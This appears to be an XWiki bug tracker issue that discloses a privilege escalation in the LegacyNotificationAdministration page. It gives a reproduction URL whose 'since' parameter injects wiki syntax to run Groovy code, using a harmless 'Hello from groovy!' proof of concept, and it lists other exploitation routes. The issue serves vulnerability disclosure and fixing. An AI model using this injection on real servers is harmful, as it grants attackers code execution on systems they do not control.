Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20287

Privilege escalation (PR) from view right on XWiki.Notifications.Code.LegacyNotificationAdministration

    XMLWordPrintable

Details

    • Unknown
    • N/A

    Description

      Steps to reproduce:

      Open <xwiki-host>/xwiki/bin/view/XWiki/Notifications/Code/LegacyNotificationAdministration?since=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello+%22+%2B+%22from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D, where <xwiki-host> is the URL of your XWiki installation.

      Expected result:

      The document displays as if if was opened without a parameter as the passed value isn't a valid date.

      Actual result:

      Failed to execute the [html] macro. Cause: [When using HTML content inline, you can only use inline HTML content. Block HTML content (such as tables) cannot be displayed. Try leaving an empty line before and after the macro.]. Click on this message for details.
      Hello from groovy!"
      

      is displayed, followed by raw HTML code. This demonstrates an XWiki syntax injection attack via the since-parameter, allowing privilege escalation from view to programming rights.

      This document has been freshly introduced in XWiki 14.6 as part of XWIKI-19826 but the same code previously existed in a template of the distribution wizard. This can be exploited similar to the steps detailed in XWIKI-19852 via the template macro either via the user account or via CKEditor's HTMLConverter or directly via xpart.vm as shown in XWIKI-19558 before this issue had been fixed (XWiki versions before 13.10.5 and 14.3-rc-1).

      Attachments

        Activity

          People

            tmortagne Thomas Mortagne
            MichaelHamann Michael Hamann
            Votes:
            0 Vote for this issue
            Watchers:
            1 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: